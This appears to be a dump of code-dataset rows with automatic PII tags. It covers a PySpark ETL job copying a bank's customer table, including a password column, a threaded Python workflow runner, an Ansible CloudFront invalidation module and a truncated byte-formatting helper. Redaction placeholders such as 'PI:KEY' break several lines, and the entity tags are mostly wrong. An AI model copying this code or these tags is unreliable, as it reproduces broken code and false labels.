etl_date +#上一日日期 +V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime(""%Y%m%d"") +#月初日期 +V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime(""%Y%m%d"") +#上月末日期 +V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime(""%Y%m%d"") +#10位日期 +V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime(""%Y-%m-%d"") +V_STEP = 0 + +O_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/O_CI_XDXT_CUSTOMER_INFO/*') +O_CI_XDXT_CUSTOMER_INFO.registerTempTable(""O_CI_XDXT_CUSTOMER_INFO"") + +#任务[12] 001-01:: +V_STEP = V_STEP + 1 +#先删除原表所有数据 +ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/*.parquet"") +#从昨天备表复制一份全量过来 +ret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"") + + +F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*') +F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"") + +sql = """""" + SELECT A.CUSTOMERID AS CUSTOMERID + ,A.CUSTOMERNAME AS CUSTOMERNAME + ,A.CUSTOMERTYPE AS CUSTOMERTYPE + ,A.CERTTYPE AS CERTTYPE + ,A.CERTID AS CERTID + ,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD + ,A.INPUTORGID AS INPUTORGID + ,A.INPUTUSERID AS INPUTUSERID + ,A.INPUTDATE AS INPUTDATE + ,A.REMARK AS REMARK + ,A.MFCUSTOMERID AS MFCUSTOMERID + ,A.STATUS AS STATUS + ,A.BELONGGROUPID AS BELONGGROUPID + ,A.CHANNEL AS CHANNEL + ,A.LOANCARDNO AS LOANCARDNO + ,A.CUSTOMERSCALE AS CUSTOMERSCALE + 
,A.CORPORATEORGID AS CORPORATEORGID + ,A.REMEDYFLAG AS REMEDYFLAG + ,A.DRAWFLAG AS DRAWFLAG + ,A.MANAGERUSERID AS MANAGERUSERID + ,A.MANAGERORGID AS MANAGERORGID + ,A.DRAWELIGIBILITY AS DRAWELIGIBILITY + ,A.BLACKSHEETORNOT AS BLACKSHEETORNOT + ,A.CONFIRMORNOT AS CONFIRMORNOT + ,A.CLIENTCLASSN AS CLIENTCLASSN + ,A.CLIENTCLASSM AS CLIENTCLASSM + ,A.BUSINESSSTATE AS BUSINESSSTATE + ,A.MASTERBALANCE AS MASTERBALANCE + ,A.UPDATEDATE AS UPDATEDATE + ,A.FR_ID AS FR_ID + ,V_DT AS ODS_ST_DATE + ,'LNA' AS ODS_SYS_ID + FROM O_CI_XDXT_CUSTOMER_INFO A -- customer basic information +"""""" + +sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql) +F_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql) +F_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO_INNTMP1"") + +#F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*') +#F_CI_XDXT_CUSTOMER_INFO.registerTempTable(""F_CI_XDXT_CUSTOMER_INFO"") +sql = """""" + SELECT DST.CUSTOMERID -- customer id:src.CUSTOMERID + ,DST.CUSTOMERNAME -- customer name:src.CUSTOMERNAME + ,DST.CUSTOMERTYPE -- customer type:src.CUSTOMERTYPE + ,DST.CERTTYPE -- certificate type:src.CERTTYPE + ,DST.CERTID -- certificate number:src.CERTID + ,DST.CUSTOMERPASSWORD -- customer password:src.CUSTOMERPASSWORD + ,DST.INPUTORGID -- registering organization:src.INPUTORGID + ,DST.INPUTUSERID -- registered by:src.INPUTUSERID + ,DST.INPUTDATE -- registration date:src.INPUTDATE + ,DST.REMARK -- remarks:src.REMARK + ,DST.MFCUSTOMERID -- core customer number:src.MFCUSTOMERID + ,DST.STATUS -- status:src.STATUS + ,DST.BELONGGROUPID -- affiliated group code:src.BELONGGROUPID + ,DST.CHANNEL -- channel:src.CHANNEL + ,DST.LOANCARDNO -- loan card number:src.LOANCARDNO + ,DST.CUSTOMERSCALE -- customer scale:src.CUSTOMERSCALE + ,DST.CORPORATEORGID -- legal-entity organization number:src.CORPORATEORGID + ,DST.REMEDYFLAG -- supplementary-entry flag:src.REMEDYFLAG + ,DST.DRAWFLAG -- collection flag:src.DRAWFLAG + ,DST.MANAGERUSERID -- account manager:src.MANAGERUSERID + ,DST.MANAGERORGID -- managing organization ID:src.MANAGERORGID + ,DST.DRAWELIGIBILITY -- collection eligibility:src.DRAWELIGIBILITY + ,DST.BLACKSHEETORNOT -- blacklisted customer or not:src.BLACKSHEETORNOT + ,DST.CONFIRMORNOT -- effective or not:src.CONFIRMORNOT + ,DST.CLIENTCLASSN -- current customer classification:src.CLIENTCLASSN + ,DST.CLIENTCLASSM -- customer classification adjustment:src.CLIENTCLASSM + ,DST.BUSINESSSTATE -- stock field flag:src.BUSINESSSTATE + ,DST.MASTERBALANCE -- single-account balance:src.MASTERBALANCE + ,DST.UPDATEDATE -- update date:src.UPDATEDATE + ,DST.FR_ID -- legal entity code:src.FR_ID + ,DST.ODS_ST_DATE -- platform date:src.ODS_ST_DATE + ,DST.ODS_SYS_ID -- source system code:src.ODS_SYS_ID + FROM F_CI_XDXT_CUSTOMER_INFO DST + LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC + ON SRC.CUSTOMERID = DST.CUSTOMERID + AND SRC.FR_ID = DST.FR_ID + WHERE SRC.CUSTOMERID IS NULL """""" + +sql = re.sub(r""\bV_DT\b"", ""'""+V_DT10+""'"", sql) +F_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql) +dfn=""F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet"" +PI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1) +F_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache() +F_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache() +nrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count() +nrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count() +F_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + '/' + dfn, mode='overwrite') +F_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist() +F_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist() +et = datetime.now() +print(""Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d"") % (V_STEP, st.strftime(""%H:%M:%S""), et.strftime(""%H:%M:%S""), (et-st).seconds, nrowsi, nrowsa) +ret = os.system(""hdfs dfs -mv /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/"") +# first delete today's data from the backup table +ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"") +# copy a full snapshot of today's data from the source table to the backup table +ret =
os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"") +",7703,"[['LOCATION', '处理需要使用的日期'], ['LOCATION', '月初日期'], ['DATE_TIME', 'A.CERTTYPE'], ['LOCATION', 'A.CONFIRMORNOT'], ['PERSON', 'DST.BLACKSHEETORNOT'], ['PERSON', 'BLACKSHEETORNOT'], ['LOCATION', 'DST.CONFIRMORNOT'], ['NRP', 'DST.CLIENTCLASSN'], ['PERSON', 'nrowsa'], ['LOCATION', 'nrowsi'], ['LOCATION', 'nrowsa'], ['IP_ADDRESS', '01::\n'], ['URL', 'datetime.no'], ['URL', 'sys.ar'], ['URL', 'sc.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.RE'], ['URL', 'A.ST'], ['URL', 'A.BE'], ['URL', 'A.CH'], ['URL', 'A.CU'], ['URL', 'A.CO'], ['URL', 'A.RE'], ['URL', 'A.MA'], ['URL', 'A.MA'], ['URL', 'A.CO'], ['URL', 'A.CL'], ['URL', 'A.CL'], ['URL', 'A.MA'], ['URL', 'A.FR'], ['URL', 're.su'], ['URL', 'INNTMP1.re'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.ST'], ['URL', 'src.ST'], ['URL', 'DST.BE'], ['URL', 'src.BE'], ['URL', 'DST.CH'], ['URL', 'src.CH'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.FR'], ['URL', 'src.FR'], ['URL', 'SRC.CU'], ['URL', 'DST.CU'], ['URL', 'SRC.FR'], ['URL', 'DST.FR'], ['URL', 'SRC.CU'], ['URL', 're.su'], ['URL', 'INNTMP1.ca'], ['URL', 'INNTMP2.ca'], ['URL', 'INNTMP1.co'], ['URL', 'INNTMP2.co'], ['URL', 'INNTMP2.write.sa'], ['URL', 'datetime.no'], ['URL', 'st.st'], ['URL', 'et.st'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'os.sy']]" +96,"#!/usr/bin/python +"""""" +Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved. +Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. +Authors and contributors: Eric Shook (dummy@email.com) +"""""" + +import os +import datetime +import time +import re +import subprocess +from Queue import Queue +#from threading import Thread +import threading +import sys,getopt + +''' +The workflow script accepts a tasklist file, which contains a list of taskfiles. +A task may represent a simulation of an ABM or climate model. Tasks can be run +simultaneously if there are no dependencies or ordered in the case of +dependencies. Tasks may also include pre-processing or post-processing tasks. 
+''' + +# TODO: Logging may be useful if the workflow becomes long + +# TODO: Currently num_threads is user-defined, which controls the number of threads to launch tasks +# However, it would be better to include in the taskfile the number of cores needed +# and define the number of cores available, enabling the workflow system to manage core allocation + +# Global variables + +# The number of threads used to handle tasks is passed as a parameter +num_threads=0 + +# Array of threads (so they can be killed if needed) +threads=[] + +# Array of task workflow numbers (one per thread/worker) +threadtasknums=[] + +# Task queue +taskqueue=Queue() + +# This function handles executing a task defined by a taskfile +def runtask(taskfile): + + # Read and parse the taskfile with the following format + # Note additional parameters will likely be added based on need (e.g., CWD, data-dir) + ''' + program: /path/to/executable_with_a_name + parameters: param1 -Optionalconfiguration param2 -AnotherParameter + ''' + with open(taskfile,'r') as f: + # Set the required parameters as None for error checking at the end + program=None + parameters=None + for line in f: + if line.startswith(""program:""): + # Extract the entire program location from after the colon split()[1]) with whitespace removed (strip()) + program=line.split("":"",1)[1].strip() + #print ""Program=""+program + + if line.startswith(""parameters:""): + # Extract the parameter string from after the colon split()[1]) with whitespace removed (strip()) + parameters=line.split("":"",1)[1].strip() + #print ""Parameters=""+parameters + + # Error checking for required parameters + if program==None: + raise Exception(""program missing in taskfile"",taskfile) + if parameters==None: + raise Exception(""parameters missing in taskfile"",taskfile) + + print ""Calling program=""+program,parameters + ''' + In future versions that have defined input,output,stdout,etc. + there could be more logic here to: + - run each model in a defined directory + - output stdout,stderr in the directory + - package up output files for easier transfer + - ... 
+ ''' + returncode=subprocess.check_call(program+"" ""+parameters,shell=True) + +# A task worker loops while there are tasks left in the taskqueue +# Input parameter is a thread id (tid) +def taskworker(tid): + while not taskqueue.empty(): + taskfile=taskqueue.get() + + tasknum=taskfile.split(""/"",1)[1].split(""."",1)[0].strip() + tasknum=re.sub(r""\D"", """", tasknum) + #print ""tid="",tid + threadtasknums[tid]=int(tasknum) + + # While there is a dependency problem (lower order task numbers are still being processed) + # then spin-wait + mintasknum=min(threadtasknums) + while threadtasknums[tid]>mintasknum: + #print ""min="",minthreadtasknum,""min(array)="",min(*threadtasknums),""nums["",i,""]="",threadtasknums[i] + #if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum + # break # then there are no dependencies, so you can break out of this infinite loop + time.sleep(1) # this is a spin-wait loop + mintasknum=min(*threadtasknums) + + print ""Thread"",tid,""running"",taskfile,""at"",str(datetime.datetime.now()) + try: + runtask(taskfile) + except: + exit(1) + taskqueue.task_done() + threadtasknums[tid]=999999 # Set the tasknum for tid to 999999 so it doesn't influence dependencies + print ""Thread"",tid,""quitting, because taskqueue is empty"" + +# Main program code +def main(): + print ""Starting node workflow"" + + try: + opts,args=getopt.getopt(sys.argv[1:],""n:t:"",[""numthreads="",""tasklist=""]) + except getopt.GetoptError: + print ""usage: workflow.py -n <numthreads> -t <tasklistfile>"" + sys.exit(1) + + # Set the number of threads and the tasklist file based on the command-line parameters + num_threads=0 + tasklistfile="""" + for opt, arg in opts: + if opt in (""-n"", ""--numthreads""): + num_threads=int(arg) + if opt in (""-t"", ""--tasklist""): + tasklistfile=arg + err=0 + if num_threads<=0: + print "" [ ERROR ] Number of threads must be greater than 0"" + err=1 + if tasklistfile=="""": + print "" [ ERROR ] Must provide tasklistfile"" + err=1 + if err==1: + print ""usage: workflow.py -n <numthreads> -t <tasklistfile>"" + sys.exit(1) + + print ""Executing in current directory :"",os.getcwd() + + print ""Reading tasklist file"" + with open(tasklistfile,'r') as f: + taskfiles = f.readlines() # the with block closes the file for us + + +# tasksdir = 'tasks/' +# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process + taskfiles.sort() + + print ""Starting task queue"" + for taskfile in taskfiles: + taskqueue.put(taskfile.strip()) + print ""Task queue contains "",taskqueue.qsize(),"" tasks"" + + # Start the workflow engine + # Currently the logic is simple -> one task==one thread==one core but that will need + # to be modified to account for multithreaded models (agent-based and climate) + # so eventually this will need to parse the task to determine the number of cores + # needed by the task and dynamically manage the number of tasks running simultaneously + print ""Starting "",num_threads,"" threads"" + for i in range(num_threads): + threadtasknums.append(-1) + t=threading.Thread(target=taskworker,args=(i,)) + t.daemon=True + t.start() + threads.append(t) + + # Now we wait until all of the tasks are finished. + print ""Waiting for threads to finish"" + + # Normally you can use a blocking .join, but then you cannot kill the process + # So instead we spin-wait and catch ^C so a user can kill this process. 
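+ # (A hypothetical alternative, not used here: call taskqueue.join() from a + # daemon helper thread and poll that helper with a timed Thread.join(), + # which likewise keeps the main thread free to catch KeyboardInterrupt.)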
+# while threading.activeCount() > 0: +# time.sleep(20) + while taskqueue.qsize()>0: + time.sleep(1) + print ""taskqueue size"",taskqueue.qsize() + ''' # FIXME: Need to clean up this code, which was used for testing ^C + try: + time.sleep(5) # Wait 5 seconds before checking again + # FIXME: In production this should be changed to 30 + # If Ctrl+C or other error, kill all of the threads + except: + while not taskqueue.empty(): # Empty the queue + taskqueue.get() + for i in threads: + i.kill_received=True + i.kill() + exit(1) + ''' + + print ""Joining taskqueue"" + # At this point all of the tasks should be finished so we join them + notfinished=1 + while notfinished==1: + notfinished=0 + for i in range(num_threads): + if threadtasknums[i]<999999: + notfinished=1 + time.sleep(1) + #while not taskqueue.join(1): + # time.sleep(1) + print ""Finished node workflow"" + +# Run main +if __name__==""__main__"": + main() + +",7938,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Eric Shook'], ['PERSON', ""getopt\n\n'""], ['PERSON', 'TODO'], ['PERSON', 'tasknum=taskfile.split(""/"",1)[1].split(""'], ['PERSON', 'tasknum=re.sub(""\\D'], ['PERSON', 'tasknum'], ['PERSON', 'mintasknum=min(threadtasknums'], ['PERSON', 'tasksdir'], ['LOCATION', '.join'], ['DATE_TIME', '5 seconds'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'subprocess.ch'], ['URL', 'taskqueue.ge'], ['URL', 're.su'], ['URL', 'time.sl'], ['URL', 'datetime.datetime.no'], ['URL', 'getopt.ge'], ['URL', 'sys.ar'], ['URL', 'getopt.Ge'], ['URL', 'workflow.py'], ['URL', 'workflow.py'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'f.cl'], ['URL', 'os.li'], ['URL', 'taskfiles.so'], ['URL', 'taskfile.st'], ['URL', 'threading.Th'], ['URL', 't.se'], ['URL', 't.st'], ['URL', 'threading.ac'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'taskqueue.ge'], ['URL', 'i.ki'], ['URL', 'i.ki'], ['URL', 'time.sl'], ['URL', 'taskqueue.jo'], ['URL', 'time.sl']]" +97,"#!/usr/bin/python +# Copyright (c) 2017 Ansible Project +# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) + +from __future__ import (absolute_import, division, print_function) +__metaclass__ = type + +ANSIBLE_METADATA = {'metadata_version': '1.1', + 'status': ['preview'], + 'supported_by': 'community'} + +DOCUMENTATION = ''' +--- + +module: cloudfront_invalidation + +short_description: create invalidations for AWS CloudFront distributions +description: + - Allows for invalidation of a batch of paths for a CloudFront distribution. + +requirements: + - boto3 >= 1.0.0 + - python >= 2.6 + +version_added: ""2.5"" + +author: Willem van Ketwich (@wilvk) + +extends_documentation_fragment: + - aws + - ec2 + +options: + distribution_id: + description: + - The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias. + required: false + type: str + alias: + description: + - The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id. + required: false + type: str + caller_reference: + description: + - A unique reference identifier for the invalidation paths. + - Defaults to current datetime stamp. + required: false + default: + type: str + target_paths: + description: + - A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed. eg. 
'/foo/bar/*' + required: true + type: list + elements: str + +notes: + - does not support check mode + +''' + +EXAMPLES = ''' + +- name: create a batch of invalidations using a distribution_id for a reference + cloudfront_invalidation: + distribution_id: E15BU8SDCGSG57 + caller_reference: testing 123 + target_paths: + - /testpathone/test1.css + - /testpathtwo/test2.js + - /testpaththree/test3.ss + +- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match + cloudfront_invalidation: + alias: alias.test.com + caller_reference: testing 123 + target_paths: + - /testpathone/test4.css + - /testpathtwo/test5.js + - /testpaththree/* + +''' + +RETURN = ''' +invalidation: + description: The invalidation's information. + returned: always + type: complex + contains: + create_time: + description: The date and time the invalidation request was first made. + returned: always + type: str + sample: '2018-02-01T15:50:41.159000+00:00' + id: + description: The identifier for the invalidation request. + returned: always + type: str + sample: I2G9MOWJZFV612 + invalidation_batch: + description: The current invalidation information for the batch request. + returned: always + type: complex + contains: + caller_reference: + description: The value used to uniquely identify an invalidation request. + returned: always + type: str + sample: testing 123 + paths: + description: A dict that contains information about the objects that you want to invalidate. + returned: always + type: complex + contains: + items: + description: A list of the paths that you want to invalidate. + returned: always + type: list + sample: + - /testpathtwo/test2.js + - /testpathone/test1.css + - /testpaththree/test3.ss + quantity: + description: The number of objects that you want to invalidate. + returned: always + type: int + sample: 3 + status: + description: The status of the invalidation request. + returned: always + type: str + sample: Completed +location: + description: The fully qualified URI of the distribution and invalidation batch request. 
+ returned: always + type: str + sample: https://cloudfront.amazonaws.PI:KEY +''' + +from ansible.module_utils.ec2 import get_aws_connection_info +from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn +from ansible.module_utils.ec2 import snake_dict_to_camel_dict +from ansible.module_utils.ec2 import camel_dict_to_snake_dict +from ansible.module_utils.aws.core import AnsibleAWSModule +from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager +import datetime + +try: + from botocore.exceptions import ClientError, BotoCoreError +except ImportError: + pass # caught by imported AnsibleAWSModule + + +class CloudFrontInvalidationServiceManager(object): + """""" + Handles CloudFront service calls to AWS for invalidations + """""" + + def __init__(self, module): + self.module = module + self.create_client('cloudfront') + + def create_client(self, resource): + region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True) + self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs) + + def create_invalidation(self, distribution_id, invalidation_batch): + current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference']) + try: + response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch) + response.pop('ResponseMetadata', None) + if current_invalidation_response: + return response, False + else: + return response, True + except BotoCoreError as e: + self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."") + except ClientError as e: + if ('Your request contains a caller reference that was used for a previous invalidation batch ' + 'for the same distribution.' in e.response['Error']['Message']): + self.module.warn(""InvalidationBatch target paths are not modifiable. 
"" + ""To make a new invalidation please update caller_reference."") + return current_invalidation_response, False + else: + self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."") + + def get_invalidation(self, distribution_id, caller_reference): + current_invalidation = {} + # find all invalidations for the distribution + try: + paginator = self.client.get_paginator('list_invalidations') + invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', []) + invalidation_ids = [inv['Id'] for inv in invalidations] + except (BotoCoreError, ClientError) as e: + self.module.fail_json_aws(e, msg=""Error listing CloudFront invalidations."") + + # check if there is an invalidation with the same caller reference + for inv_id in invalidation_ids: + try: + invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation'] + caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference') + except (BotoCoreError, ClientError) as e: + self.module.fail_json_aws(e, msg=""Error getting CloudFront invalidation {0}"".format(inv_id)) + if caller_ref == caller_reference: + current_invalidation = invalidation + break + + current_invalidation.pop('ResponseMetadata', None) + return current_invalidation + + +class CloudFrontInvalidationValidationManager(object): + """""" + Manages CloudFront validations for invalidation batches + """""" + + def __init__(self, module): + self.module = module + self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module) + + def validate_distribution_id(self, distribution_id, alias): + try: + if distribution_id is None and alias is None: + self.module.fail_json(msg=""distribution_id or alias must be specified"") + if distribution_id is None: + distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias) + return distribution_id + except (ClientError, BotoCoreError) as e: + self.module.fail_json_aws(e, msg=""Error validating parameters."") + + def create_aws_list(self, invalidation_batch): + aws_list = {} + aws_list[""Quantity""] = len(invalidation_batch) + aws_list[""Items""] = invalidation_batch + return aws_list + + def validate_invalidation_batch(self, invalidation_batch, caller_reference): + try: + if caller_reference is not None: + valid_caller_reference = caller_reference + else: + valid_caller_reference = datetime.datetime.now().isoformat() + valid_invalidation_batch = { + 'paths': self.create_aws_list(invalidation_batch), + 'caller_reference': valid_caller_reference + } + return valid_invalidation_batch + except (ClientError, BotoCoreError) as e: + self.module.fail_json_aws(e, msg=""Error validating invalidation batch."") + + +def main(): + argument_spec = ec2_argument_spec() + + argument_spec.update(dict( + caller_reference=dict(), + distribution_id=dict(), + alias=dict(), + target_paths=dict(required=True, type='list') + )) + + module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']]) + + validation_mgr = CloudFrontInvalidationValidationManager(module) + service_mgr = CloudFrontInvalidationServiceManager(module) + + caller_reference = module.params.get('caller_reference') + distribution_id = module.params.get('distribution_id') + alias = module.params.get('alias') + target_paths = module.params.get('target_paths') + + result = {} + + distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias) + 
valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference) + valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True) + result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths) + + module.exit_json(changed=changed, **camel_dict_to_snake_dict(result)) + + +if __name__ == '__main__': + main() +",10484,"[['DATE_TIME', '2017'], ['PERSON', 'Willem van Ketwich'], ['DATE_TIME', '2018-02-01T15:50:41.159000+'], ['DATE_TIME', ""00:00'\n i""], ['PERSON', 'aws_connect_kwargs = get_aws_connection_info(self.module'], ['URL', 'self.mo'], ['LOCATION', 'BotoCoreError'], ['LOCATION', 'BotoCoreError'], ['PERSON', ""caller_reference = module.params.get('caller_reference'""], ['LOCATION', 'validation_mgr.validate_invalidation_batch(target_paths'], ['URL', 'https://www.gnu.org/licenses/gpl-3.0.txt'], ['URL', 'https://cloudfront.am'], ['URL', 'alias.test.com'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.co'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.cl'], ['URL', 'self.mo'], ['URL', 'self.cr'], ['URL', 'self.cl'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.client.cr'], ['URL', 'self.mo'], ['URL', 'e.re'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'paginator.pa'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'invalidation.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'mgr.ge'], ['URL', 'self.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'self.cr'], ['URL', 'self.mo'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'mgr.va'], ['URL', 'mgr.va'], ['URL', 'mgr.cr']]" +98,"#!/usr/bin/env python +# -*- coding: utf-8 -*- + +# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND +# Yves Junqueira (dummy@email.com) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + +# from http://www.voidspace.org.uk/python/pathutils.html (BSD License) + +def formatbytes(sizeint, configdict=None, **configs): + """""" + Given a file size as an integer, return a nicely formatted string that + represents the size. Has various options to control it's output. + + You can pass in a dictionary of arguments or keyword arguments. Keyword + arguments override the dictionary and there are sensible defaults for options + you don't set. + + Options and defaults are as follows : + + * ``forcekb = False`` - If set this forces the output to be in terms + of kilobytes and bytes only. + + * ``largestonly = True`` - If set, instead of outputting + ``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest + denominator - e.g. 
``1.3 Mbytes`` or ``17.2 Kbytes`` + + * ``kiloname = 'Kbytes'`` - The string to use for kilobytes + + * ``meganame = 'Mbytes'`` - The string to use for Megabytes + + * ``bytename = 'bytes'`` - The string to use for bytes + + * ``nospace = True`` - If set it outputs ``1Mbytes, 307Kbytes``, + notice there is no space. + + Example outputs : :: + + 19Mbytes, 75Kbytes, 255bytes + 2Kbytes, 0bytes + 23.8Mbytes + + .. note:: + + It currently uses the plural form even for singular. + """""" + defaultconfigs = { 'forcekb' : False, + 'largestonly' : True, + 'kiloname' : 'Kbytes', + 'meganame' : 'Mbytes', + 'bytename' : 'bytes', + 'nospace' : True} + if configdict is None: + configdict = {} + for entry in configs: + # keyword parameters override the dictionary passed in + configdict[entry] = configs[entry] + # + for keyword in defaultconfigs: + if not configdict.has_key(keyword): + configdict[keyword] = defaultconfigs[keyword] + # + if configdict['nospace']: + space = '' + else: + space = ' ' + # + mb, kb, rb = bytedivider(sizeint) + if configdict['largestonly']: + if mb and not configdict['forcekb']: + return stringround(mb, kb)+ space + configdict['meganame'] + elif kb or configdict['forcekb']: + if mb and configdict['forcekb']: + kb += 1024*mb + return stringround(kb, rb) + space+ configdict['kiloname'] + else: + return str(rb) + space + configdict['bytename'] + else: + outstr = '' + if mb and not configdict['forcekb']: + outstr = str(mb) + space + configdict['meganame'] +', ' + if kb or configdict['forcekb'] or mb: + if configdict['forcekb']: + kb += 1024*mb + outstr += str(kb) + space + 